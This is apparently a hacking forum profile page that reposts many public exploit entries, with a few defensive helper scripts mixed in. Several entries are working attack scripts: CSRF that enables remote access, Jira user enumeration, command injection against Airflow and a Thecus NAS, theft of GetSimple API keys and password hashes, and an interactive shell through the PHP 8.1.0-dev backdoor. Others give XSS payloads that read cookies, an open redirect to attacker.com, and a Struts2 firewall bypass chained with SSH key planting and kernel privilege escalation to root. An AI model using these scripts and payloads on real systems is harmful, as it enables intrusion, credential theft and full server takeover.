
Everything posted by HireHackking
-
Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)
# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)
# Date: 2021-05-30
# Exploit Author: lated
# Vendor Homepage: https://www.ubeeinteractive.com
# Version: EVW327

<html>
<body>
<form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST">
<input type="hidden" name="RemoteAccessEnable" value="1"/>
<input type="hidden" name="RemoteAccessPort" value="8080"/>
<input type="hidden" name="ApplyRemoteEnableAction" value="1"/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
-
Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
# Date: 31/05/2021
# Exploit Author: Mohammed Aloraimi
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira
# Vulnerable versions: version 8.11.x to 8.15.0
# Tested on: Kali Linux
# Proof Of Concept:

'''
A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x.
Unauthenticated users can enumerate valid users via the /secure/QueryComponent!Jql.jspa endpoint.

Tested versions:
Atlassian JIRA 8.11.1
Atlassian JIRA 8.13
Atlassian JIRA 8.15
'''

#!/usr/bin/env python
__author__ = "Mohammed Aloraimi (@ixSly)"

import requests
import sys
import re
import urllib3

urllib3.disable_warnings()


def help():
    print('python script.py <target> <username>')
    print('e.g. python script.py https://jiratarget.com admin')
    sys.exit()


if len(sys.argv) < 3:
    help()


def pwn(url, username):
    try:
        headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}
        data = "jql=creator+in+({})&decorator=none".format(username)
        req = requests.post(url + "/secure/QueryComponent!Jql.jspa", headers=headers, verify=False, data=data)
        # A valid user resolves to a 200 with field metadata; an unknown one yields 401 "jqlTooComplex".
        if "issue.field.project" in req.text and req.status_code == 200:
            print("[+] {} is a Valid User".format(username))
            userFullName = re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),
                                     str(req.json()["values"]["creator"]).strip())
            if userFullName:
                print("[+] User FullName: " + userFullName.group(1))
        elif '["jqlTooComplex"]' in req.text and req.status_code == 401:
            print("[-] {} is not a Valid User".format(username))
        else:
            print("[-] Error..")
    except Exception as e:
        print(str(e))
        pass


server = sys.argv[1]
username = sys.argv[2]
pwn(server, username)
-
CHIYU TCP/IP Converter devices - CRLF injection
# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021
# Tested on: BF-430, BF-431, and BF-450M
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.

CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249

Affected parameter: redirect=
Component: all the CGI components
Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>

====HTTP request======
GET /man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1

======HTTP response========
HTTP/1.1 302 Found
Location: setting.htm

<script>alert(document.domain)</script>
Content-Length: 0
Content-Type: text/html

Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to all CGI components
3. Append the payload at the end of the vulnerable parameter (redirect)
4. Submit the request and observe payload execution

Mitigation: The latest version of the CHIYU firmware should be installed to mitigate this vulnerability.
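The header-splitting mechanism behind this advisory, modelled in Python as an added example (not CHIYU's firmware code, which is closed source): a handler that copies the decoded redirect= value straight into the Location header, beside a hardened version that accepts only names from an assumed allow-list of local pages, plus a check that exposes any injected body.

```python
import re
from urllib.parse import unquote

# Constructed model of the redirect= handling described in the advisory.
# The allow-list of page names is an assumption for this example.
ALLOWED_PAGES = {"setting.htm", "manage.htm", "fail.htm"}
SAFE_PAGE = re.compile(r"^[A-Za-z0-9_-]+\.htm$")


class RedirectRejected(ValueError):
    """Raised by the hardened handler when redirect= is not a plain local page."""


def build_redirect_vulnerable(redirect_param: str) -> bytes:
    """Mirror the observed behaviour: the decoded parameter is copied verbatim
    into the Location header, so %0d%0a%0d%0a ends the header block early and
    everything after it becomes the response body."""
    target = unquote(redirect_param)
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n"
            "Content-Type: text/html\r\n"
            "\r\n").encode()


def build_redirect_hardened(redirect_param: str) -> bytes:
    """Same response, but the target must be a known local page name after
    decoding: no CR/LF, no path separators, no scheme, nothing off the list.
    Double-encoded input (%250d) decodes to a literal '%' and fails SAFE_PAGE."""
    target = unquote(redirect_param)
    if "\r" in target or "\n" in target:
        raise RedirectRejected("CR/LF in redirect target")
    if not SAFE_PAGE.match(target) or target not in ALLOWED_PAGES:
        raise RedirectRejected("redirect target is not an allowed page: %r" % target)
    return ("HTTP/1.1 302 Found\r\n"
            "Location: " + target + "\r\n"
            "Content-Length: 0\r\n"
            "Content-Type: text/html\r\n"
            "\r\n").encode()


def response_body(raw: bytes) -> bytes:
    """Return whatever follows the first blank line. A 302 built by these
    handlers declares Content-Length: 0, so any body at all was injected."""
    _, _, body = raw.partition(b"\r\n\r\n")
    return body


def hardened_accepts(redirect_param: str) -> bool:
    try:
        build_redirect_hardened(redirect_param)
        return True
    except RedirectRejected:
        return False


if __name__ == "__main__":
    # Constructed input in the shape of the advisory's payload, with a harmless marker.
    injected = "setting.htm%0d%0a%0d%0a<b>injected</b>"
    print(build_redirect_vulnerable(injected).decode())
    print("hardened accepts payload:", hardened_accepts(injected))
    print("hardened accepts setting.htm:", hardened_accepts("setting.htm"))
```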
-
Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution
# Exploit Title: Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution
# Date: 2021-06-02
# Exploit Author: Pepe Berba
# Vendor Homepage: https://airflow.apache.org/
# Software Link: https://airflow.apache.org/docs/apache-airflow/stable/installation.html
# Version: <= 1.10.10
# Tested on: Docker apache/airflow:1.10.10 (https://github.com/pberba/CVE-2020-11978/blob/main/docker-compose.yml)
# CVE : CVE-2020-11978
#
# This is a proof of concept for CVE-2020-11978, a RCE vulnerability in one of the example DAGs shipped with airflow
# This combines with CVE-2020-13927 where unauthenticated requests to Airflow's Experimental API were allowed by default.
# Together, potentially allows unauthenticated RCE to Airflow
#
# Repo: https://github.com/pberba/CVE-2020-11978
# More information can be found here:
# https://lists.apache.org/thread.html/r23a81b247aa346ff193670be565b2b8ea4b17ddbc7a35fc099c1aadd%40%3Cdev.airflow.apache.org%3E
# https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
#
# Remediation:
# For CVE-2020-13927 make sure that the config `[api]auth_backend = airflow.api.auth.backend.deny_all` or has auth set.
# For CVE-2020-11978 use 1.10.11 or set `load_examples=False` when initializing Airflow. You can also manually delete example_trigger_target_dag DAG.
#
# Example usage: python CVE-2020-11978.py http://127.0.0.1:8080 "touch test"

import argparse
import requests
import sys
import time


def create_dag(url, cmd):
    print('[+] Checking if Airflow Experimental REST API is accessible...')
    check = requests.get('{}/api/experimental/test'.format(url))
    if check.status_code == 200:
        print('[+] /api/experimental/test returned 200')
    else:
        print('[!] /api/experimental/test returned {}'.format(check.status_code))
        print('[!] Airflow Experimental REST API may not be accessible')
        sys.exit(1)

    check_task = requests.get('{}/api/experimental/dags/example_trigger_target_dag/tasks/bash_task'.format(url))
    if check_task.status_code != 200:
        print('[!] Failed to find the example_trigger_target_dag.bash_task')
        print('[!] Host isn\'t vulnerable to CVE-2020-11978')
        sys.exit(1)
    elif 'dag_run' in check_task.json()['env']:
        # The fixed example DAG passes the message via the task environment instead of templating it into the command.
        print('[!] example_trigger_target_dag.bash_task is patched')
        print('[!] Host isn\'t vulnerable to CVE-2020-11978')
        sys.exit(1)

    print('[+] example_trigger_target_dag.bash_task is vulnerable')

    unpause = requests.get('{}/api/experimental/dags/example_trigger_target_dag/paused/false'.format(url))
    if unpause.status_code != 200:
        print('[!] Unable to enable example_trigger_target_dag. Example dags were not loaded')
        sys.exit(1)
    else:
        print('[+] example_trigger_target_dag was enabled')

    print('[+] Creating new DAG...')
    res = requests.post(
        '{}/api/experimental/dags/example_trigger_target_dag/dag_runs'.format(url),
        json={
            'conf': {
                'message': '"; {} #'.format(cmd)
            }
        }
    )
    if res.status_code == 200:
        print('[+] Successfully created DAG')
        print('[+] "{}"'.format(res.json()['message']))
    else:
        print('[!] Failed to create DAG')
        sys.exit(1)

    wait_url = '{url}/api/experimental/dags/example_trigger_target_dag/dag_runs/{execution_date}/tasks/bash_task'.format(
        url=url,
        execution_date=res.json()['execution_date']
    )

    start_time = time.time()
    print('[.] Waiting for the scheduler to run the DAG... This might take a minute.')
    print('[.] If the bash task is never queued, then the scheduler might not be running.')
    while True:
        time.sleep(10)
        res = requests.get(wait_url)
        status = res.json()['state']
        if status == 'queued':
            print('[.] Bash task queued...')
        elif status == 'running':
            print('[+] Bash task running...')
        elif status == 'success':
            print('[+] Bash task successfully ran')
            break
        elif status == 'None':
            print('[-] Bash task is not yet queued...')
        else:
            print('[!] Bash task was {}'.format(status))
            sys.exit(1)
    return 0


def main():
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('url', type=str, help="Base URL for Airflow")
    arg_parser.add_argument('command', type=str)
    args = arg_parser.parse_args()
    create_dag(args.url, args.command)


if __name__ == '__main__':
    main()
-
Thecus N4800Eco Nas Server Control Panel - Command Injection
# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Command Injection
# Date: 01/06/2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: http://www.thecus.com/
# Software Link: http://www.thecus.com/product.php?PROD_ID=83
# Version: N4800Eco
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection

#!/usr/bin/python3
import requests
import sys
import urllib3

# To fix the SSL error that occurs when the script is started:
# 1- Open the /etc/ssl/openssl.cnf file
#    At the bottom of the file:
#    [system_default_sect]
#    MinProtocol = TLSv1.2
#    CipherString = DEFAULT@SECLEVEL=2
# 2- Set the value of MinProtocol to TLSv1.0


def readResult(s, target):
    # The injected command's output lands in the system log; query the newest entry.
    d = {
        "fun": "setlog",
        "action": "query",
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
    }
    url = "http://" + target + "/adm/setmain.php"
    resultReq = s.post(url, data=d, verify=False)
    words = resultReq.text.split()
    print("[+] Reading system log...\n")
    print(words[5:8])  # change this range to read the whole output of the command


def delUser(s, target, command):
    d = {
        "action": "delete",
        "username": "$(" + command + ")"
    }
    url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
    if 'Local User remove succeeds' in delUserReq.text:
        print('[+] %s command was executed successfully' % command)
    else:
        print('[-] %s command was not executed!' % command)
        sys.exit(1)
    readResult(s, target)


def addUser(s, target, command):
    d = {'batch_content': '%24(' + command + ')%2C22222%2C9999'}
    url = "http://" + target + "/adm/setmain.php?fun=setbatch"
    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
    if 'Users and groups were created successfully.' in addUserReq.text:
        print('[+] Users and groups were created successfully')
    else:
        print('[-] Users and groups were not created')
        sys.exit(1)
    delUser(s, target, command)


def login(target, username, password, command=None):
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    d = {
        "&eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer"
    }
    url = "http://" + target + "/adm/login.php"
    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
    if '"success":true' in loginReq.text:
        print('[+] Authentication successful')
    elif '"success":false' in loginReq.text:
        print('[-] Authentication failed!')
        sys.exit(1)
    else:
        print('[-] Something went wrong!')
        sys.exit(1)
    addUser(s, target, command)


def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % (args[0]))
        print("Example 192.168.1.13:80 admin admin id")
        sys.exit(1)
    login(target=args[1], username=args[2], password=args[3], command=args[4])


if __name__ == "__main__":
    main(args=sys.argv)
-
Veyon 4.4.1 - 'VeyonService' Unquoted Service Path
# Exploit Title: Veyon 4.4.1 - 'VeyonService' Unquoted Service Path
# Discovery by: Víctor García
# Discovery Date: 2020-03-23
# Vendor Homepage: https://veyon.io/
# Software Link: https://github.com/veyon/veyon/releases/download/v4.4.1/veyon-4.4.1.0-win64-setup.exe
# Tested Version: 4.4.1
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Pro x64
# CVE: CVE-2020-15261

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Veyon Service    VeyonService    C:\Program Files\Veyon\veyon-service.exe

# Service info:

C:\>sc qc VeyonService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VeyonService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Veyon\veyon-service.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Veyon Service
        DEPENDENCIES       : Tcpip
                           : RpcSs
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the
# system root path undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If successful, the local
# user's code would execute with the elevated privileges of the application.
-
Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
# Exploit Title: Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path
# Date: 06-01-2021
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version: 01.00.1080.0
# File Version: 1.00.1080.0
# Tested on: Microsoft® Windows 10 Home Single Language 10.0.19042 x64 es
# Vulnerability Type: Unquoted Service Path

# 1. To find the unquoted service path vulnerability

C:\>wmic service where 'name like "%IntelAudioService%"' get name, displayname, pathname, startmode, startname
DisplayName             Name               PathName                                                                   StartMode  StartName
Intel(R) Audio Service  IntelAudioService  C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe       Auto       LocalSystem

# 2. To check service info:

C:\>sc qc "IntelAudioService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: IntelAudioService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Intel(R) Audio Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# 3. Exploit:
To exploit this vulnerability an attacker needs to drop a malicious executable into the service path, undetected by the OS, in order to gain SYSTEM privileges.
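An added audit helper for the Veyon and Intel entries above (not part of either advisory): it reads the image path out of the `sc qc` output shown on this page (English or Spanish key names) and lists the paths CreateProcess would try for an unquoted path with spaces, following the documented CreateProcess rule, so a defender can see which directories' ACLs need checking.

```python
import ntpath
import re

# Added audit helper for the two unquoted-service-path advisories above (not part of
# either advisory). The sc qc excerpts below are the ones printed on this page.
SC_QC_VEYON = r"""
SERVICE_NAME: VeyonService
        TYPE               : 10  WIN32_OWN_PROCESS
        BINARY_PATH_NAME   : C:\Program Files\Veyon\veyon-service.exe
        SERVICE_START_NAME : LocalSystem
"""
SC_QC_INTEL = r"""
NOMBRE_SERVICIO: IntelAudioService
        TIPO               : 10  WIN32_OWN_PROCESS
        NOMBRE_RUTA_BINARIO: C:\WINDOWS\system32\cAVS\Intel(R) Audio Service\IntelAudioService.exe
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""

# sc prints the image path under a locale-dependent key; these are the two seen above.
_BINARY_PATH_RE = re.compile(r"^\s*(BINARY_PATH_NAME|NOMBRE_RUTA_BINARIO)\s*:\s*(.+?)\s*$")


def binary_path_from_sc_qc(sc_output: str) -> str:
    """Extract the service image path from `sc qc` output."""
    for line in sc_output.splitlines():
        m = _BINARY_PATH_RE.match(line)
        if m:
            return m.group(2)
    raise ValueError("no binary path line found in sc qc output")


def unquoted_path_candidates(image_path: str) -> list:
    """Executables Windows tries, in order, for an unquoted image path with spaces.

    CreateProcess splits an unquoted command line at each space and tries each
    prefix as the program name, appending .exe when the prefix has no extension
    (the "c:\program.exe files\..." rule in the CreateProcess documentation).
    A quoted path or one without spaces is unambiguous and yields []. Arguments
    after the executable are not separated here, so the last entry is the full string.
    """
    image_path = image_path.strip()
    if image_path.startswith('"') or " " not in image_path:
        return []
    parts = image_path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if "." not in ntpath.basename(prefix):
            prefix += ".exe"
        candidates.append(prefix)
    return candidates


def dirs_to_review(image_path: str) -> list:
    """Directories whose ACLs decide whether a planted file would be picked first:
    the parent of every candidate except the genuine executable. These are the
    places to confirm that standard users cannot create files."""
    candidates = unquoted_path_candidates(image_path)
    return sorted({ntpath.dirname(c) for c in candidates[:-1]})


def audit(sc_output: str) -> dict:
    """Full check for one service: image path, lookup order, directories to review."""
    path = binary_path_from_sc_qc(sc_output)
    return {"path": path,
            "candidates": unquoted_path_candidates(path),
            "review": dirs_to_review(path)}


if __name__ == "__main__":
    for sample in (SC_QC_VEYON, SC_QC_INTEL):
        print(audit(sample))
```

Quoting the path (`sc config <name> binPath= "\"C:\...\x.exe\""`) removes the ambiguity; the candidate list is empty for a quoted path.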
-
GetSimple CMS 3.3.4 - Information Disclosure
# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure
# Date 01.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: http://get-simple.info/
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip
# Version: 3.3.4
# CVE: CVE-2014-8722
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit

'''
Description:
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to
(1) data/users/<username>.xml, (2) backups/users/<username>.xml.bak, (3) data/other/authorization.xml,
or (4) data/other/appid.xml.
'''

'''
Import required modules:
'''
import sys
import requests

'''
User-Input:
'''
target_ip = sys.argv[1]
target_port = sys.argv[2]
cmspath = sys.argv[3]
print('')
username = input("Do you know the username? Y/N: ")
if username == 'Y':
    print('')
    username = True
    username_string = input('Please enter the username: ')
else:
    print('')
    username = False
    print('No problem, you will still get the API key')

'''
Get Api-Key:
'''
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Cache-Control": "max-age=0"
}
x = requests.get(url, headers=header).text
start = x.find('[') + 7  # skip past the "<![CDATA[" wrapper to the start of the key
end = x.find(']')
api_key = x[start:end]
print('')
print('Informations:')
print('')
print('[*] API Key: ' + api_key)

if username:
    '''
    Get Email and Passwordhash:
    '''
    url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'
    header = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "close",
        "Upgrade-Insecure-Requests": "1",
        "Cache-Control": "max-age=0"
    }
    x = requests.get(url, headers=header).text
    start = x[x.find('PWD>'):]
    passwordhash = start[start.find('>') + 1:start.find('<')]
    print('[*] Hashed Password: ' + passwordhash)
    start = x[x.find('EMAIL>'):]
    email = start[start.find('>') + 1:start.find('<')]
    print('[*] Email: ' + email)
    print('')
-
Seo Panel 4.8.0 - 'from_time' Reflected XSS
# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS
# Date: 23-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Version: Seo Panel 4.8.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-28420

-Description:
A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote attackers to inject JavaScript via alerts.php and the "from_time" parameter.

-Payload used:
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

-Steps to reproduce:
1- Login to SEO admin panel
2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11
3- Hover your mouse over the "Period" field
-
Seo Panel 4.8.0 - 'search_name' Reflected XSS
# Exploit Title: Seo Panel 4.8.0 - 'search_name' Reflected XSS
# Date: 21-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: Seo Panel 4.8.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-28417

-Description:
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.

-Payload used:
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

-Steps to reproduce:
1- Login to SEO admin panel
2- Add the line below at the end:
http://localhost/archive.php?from_time=2021-03-08&order_col=name&order_val=DESC&report_type=website-search-reports&search_name=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&sec=viewWebsiteSearchSummary&to_time=2021-03-09&website_id=http%3a%2f%2fwww.example.com
3- Hover your mouse near the "CTR" field
-
Products.PluggableAuthService 2.6.0 - Open Redirect
# Exploit Title: Products.PluggableAuthService 2.6.0 - Open Redirect
# Exploit Author: Piyush Patil
# Affected Component: Pluggable Zope authentication/authorization framework
# Component Link: https://pypi.org/project/Products.PluggableAuthService/
# Version: < 2.6.1
# CVE: CVE-2021-21337
# Reference: https://github.com/zopefoundation/Products.PluggableAuthService/security/advisories/GHSA-p44j-xrqg-4xrr

--------------------------Proof of Concept-----------------------
1- Go to https://localhost/login
2- Turn on intercept and click on the login
3- Change the "came_from" parameter value to https://attacker.com
4- The user will be redirected to an attacker-controlled website.

Fix:
pip install "Products.PluggableAuthService>=2.6.1"
-
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
# Date: 23 may 2021
# Exploit Author: flast101
# Vendor Homepage: https://www.php.net/
# Software Link:
# - https://hub.docker.com/r/phpdaily/php
# - https://github.com/phpdaily/php
# Version: 8.1.0-dev
# Tested on: Ubuntu 20.04
# References:
# - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
# - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

"""
Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
Contact: flast101.sec@gmail.com

An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
The following exploit uses the backdoor to provide a pseudo shell on the host.
"""

#!/usr/bin/env python3
import sys
import requests

host = input("Enter the full host url:\n")
request = requests.Session()
response = request.get(host)
if response.status_code == 200:
    print("\nInteractive shell is opened on", host, "\nCan't access tty; job control turned off.")
    try:
        while 1:
            cmd = input("$ ")
            headers = {
                "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                "User-Agentt": "zerodiumsystem('" + cmd + "');"
            }
            response = request.get(host, headers=headers, allow_redirects=False)
            current_page = response.text
            # The command output is emitted before the page markup; keep only that part.
            stdout = current_page.split('<!DOCTYPE html>', 1)
            print(stdout[0])
    except KeyboardInterrupt:
        print("Exiting...")
        sys.exit()
else:
    print("\r")
    print(response)
    print("Host is not available, aborting...")
    sys.exit()
-
Bypassing a firewall to obtain RCE and escalate privileges to root in one go

This article is about Apache Struts2 CVE-2013-2251, a vulnerability that has been exploited very heavily because of its remote command execution impact. In short, the vulnerability is introduced by manipulating parameters prefixed with "action:"/"redirect:"/"redirectAction:", and it allows remote command execution on Java web applications that use Struts 2.3.15 as their framework.

As the vulnerability spread virally, the major application firewall vendors began updating their rule engines and detection techniques to stop it. However, the author was able not only to bypass the firewall and obtain remote code execution, but also to escalate privileges and obtain root on the server by exploiting a kernel vulnerability.

While the author was testing a travel booking website, finding out whether the application ran on a vulnerable Apache Struts framework only required checking "action, redirect, redirectAction" together with a correct, working attack payload; a blog exploiting the PoC (an OGNL expression has to be constructed) was found via Google: http://blog.opensecurityresearch.com/2014/02/attacking-struts-with-cve-2013-2251.html. Below is the payload used to run the command "ifconfig":

redirect: ${#a=(new java.lang.processbuilder(new java.lang.string[] {'ifconfig'})) java.io.bufferedreader(#c), #e=new char[50000], #d.read(#e), #matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'), #matt.getwriter().

But, as expected, it was blocked by the application firewall and redirected to a bot-machine page.

As mentioned above, when something like this happens to the author, if one knows which parameters are vulnerable, one of them is the "redirect" parameter used in the request above. "Redirect", yes, you guessed right, so let's try a redirect here, simply redirecting to http://www.goal.com.

As you can see, the author received a 302 and was redirected to http://www.goal.com, whereas the earlier ifconfig command payload was blocked. This redirect behaviour gave the author the idea for bypassing the firewall, so the payload above is modified as follows:

redirect: http://www.goal.com/${#a=(new java.lang.processbuilder(new java.lang.string[] {'ifconfig'})) java.io.bufferedreader(#c), #e=new char[50000], #d.read(#e), #matt=#context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'), #matt.getwriter().

Send the request. The output of the "ifconfig" command below shows that the firewall was bypassed and execution was obtained.

The next goal is to obtain a remote shell on the server. The author obtains the shell using a reverse SSH tunnel and public-key authentication, which lets an SSH user log in without entering a password. The author therefore needs to place the attacker server's SSH public key in the victim server's authentication path, ~/.ssh/authorized_keys. To obtain the authorized identity and use it as a reverse SSH tunnel, the victim SSH server's id_rsa.pub public key must also be added. To explain the two keywords above and the concept of public-key authentication: id_rsa.pub is the public key that is added to other hosts so that one can log in as that user; authorized_keys is the list of public keys that allow logging in to a particular account on a particular server.

Step 1: use the RCE to find the location of the victim server's id_rsa.pub file.
Step 2: copy authorized_keys from the victim server to the attacker server.
Step 3: copy the modified authorized_keys from the attacker server, and read id_rsa.pub to obtain the shell.
Final step: SSH uses reverse tunnelling on the attacker's machine, so the following command line was executed.

A remote shell on the server is obtained, but without permission to log in as root, that is, with limited rights to access files and execute commands. To obtain permission to log in as root, the author first checks which kernel version the victim machine is currently running. The kernel version turns out to be 2.6.32. The CVE used was found via Google; this CVE can obtain account rights and is easy to exploit: https://github.com/realtalk/cve-2013-2094. Finally, root user permission is obtained.

This is how a remote shell that roots the user's server was obtained by combining the Apache Struts 2 vulnerability with a kernel-version exploit.
-
Seo Panel 4.8.0 - 'category' Reflected XSS
# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS
# Date: 22-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: Seo Panel 4.8.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-28418

-Description:
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.

-Payload used:
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22

-Steps to reproduce:
1- Login to SEO admin panel
2- Visit: http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
3- Hover your mouse over the "Cancel" field
-
CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
